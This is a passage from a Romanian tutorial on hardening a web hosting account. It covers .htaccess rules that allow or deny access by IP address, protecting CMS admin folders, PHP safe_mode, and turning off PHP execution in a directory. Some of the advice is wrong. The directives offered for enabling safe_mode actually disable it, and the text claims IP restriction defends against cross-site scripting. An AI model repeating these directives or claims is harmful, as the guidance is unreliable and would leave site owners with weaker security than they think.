obicei aceasta optiune exista si in panoul administrativ al contului de gazduire, sau in caz contrar putem sa ne interesam de activarea ei la furnizorul serviciului de gazduire.

Cum putem sa ne protejam directoarele si scripturile sensibile cu ajutorul fisierului .htaccess?

Fisierul .htaccess exte un fisier ascuns care poate fi copiat in orice director al unui cont de gazduire. Prin intermediul acestui fisier se pot face setari referitoare la mediul de gazduire. Aceasta inseamna ca putem introduce directive pentru apache, setari php, putem proteja anumite directoare prin parola, sau prin blocarea acesului unei adrese IP sau a unei intregi retele, ba chiar putem seta ca directorul sa fi accesibil doar de la adresa noastra. Iata, cum setam ca un director sa fie accesibil doar de la adresa noastra. Creem fisierul cu numele .htaccess si introducem urmatoarele in fisier.Atentie – numele fisierului trebuie sa inceapa neaparat cu punct si trebuie copiat neaparat in directorul pe care vrem sa-l protejam.
Exemplu fisier .htaccess – permitem accesul doar de la o singura adresa IP

order deny,allow
deny from all
allow from adresa-ip
Cu ajutorul directivei “allow from adresa-ip” putem introduce adrese multiple. Nu uitati: daca aveti o adresa IP care se schimba des, de fiecare data cand vreti sa accesati directorul trebuie sa modificati acest fisier si sa introduceti adresa dvs IP actuala.
Aceasta metoda de a proteja directoare si scripturi pare a fi foarte eficienta si in cazul aplicatiilor web CMS (content managment system). Sfatul meu este sa introduceti un fisier .htaccess in directorul principal de administrare a acestei aplicatii. In cazul in care folositi wordpress, acest director este “wp-admin”, iar in cazul joomla, numele directorului este “administrator”, si asa mai departe. Cu aceasta metoda puteti sa va protejati aplicatiile web, si conturile de gazduire impotriva atacurilor xss (cross site scripting), cand atacatorii introduc in URL comenzi php sau mysql.
Exemplu fisier .htaccess – blocarea doar a anumitor adrese ip

order deny,allow
allow from all
deny from adresa-pe-care-vrei-sa-blochezi
Atentie: directivele setate in cadrul unui director se vor referi si la subdirectoare!

Securizarea contului de gazduire prin directive PHP

Pentru securitate sporita pe un server care ofera mediul PHP, este recomandata rularea PHP in SafeMode!
Cum functioneaza SafeMode pentru PHP
In SafeMode php verifica daca proprietarul scriptului de rulat este acelasi cu proprietarul fisierului pe care scriptul doreste sa il acceseze. Daca aceasta conditie nu se indeplineste, scriptul respectiv nu va putea opera. Aceasta setare a php-ului in viitor va disparea, pentru ca dezvoltatorii care lucreaza la PHP au creat alte metode de securizare, dar pentru moment inca functioneaza si este recomandata folosirea ei.
Cum setez ca php-ul sa se ruleze in SafeMode?
Panoul administrativ al contului de gazduire va ofera posibilitatea sa faceti aceasta setare, iar nu, este posibil sa o faceti si printr-o directiva in fisierul .htacces.
php_admin_flag safe_mode Off
sau
php_admin_value safe_mode 0
Cum seteaz ca PHP-ul sa nu se ruleze intr-un director?
Si raspunsul la aceasta intrebare il gasim tot printr-o directiva in fisierul .htaccess, pe care cream in directorul respectiv.
RemoveType .php
AddType application/x-httpd-php-source .php
AddHandler application/x-httpd-php-source .php
Mai sunt multe alte modalitati de securizare a conturilor de gazduire, dar eu ma opresc aici pentru moment. Poate ca in viitor voi mai aduga si alte informatii. Pana atunci,sugestiile si comentariile dumneavoastra “are welcomed”!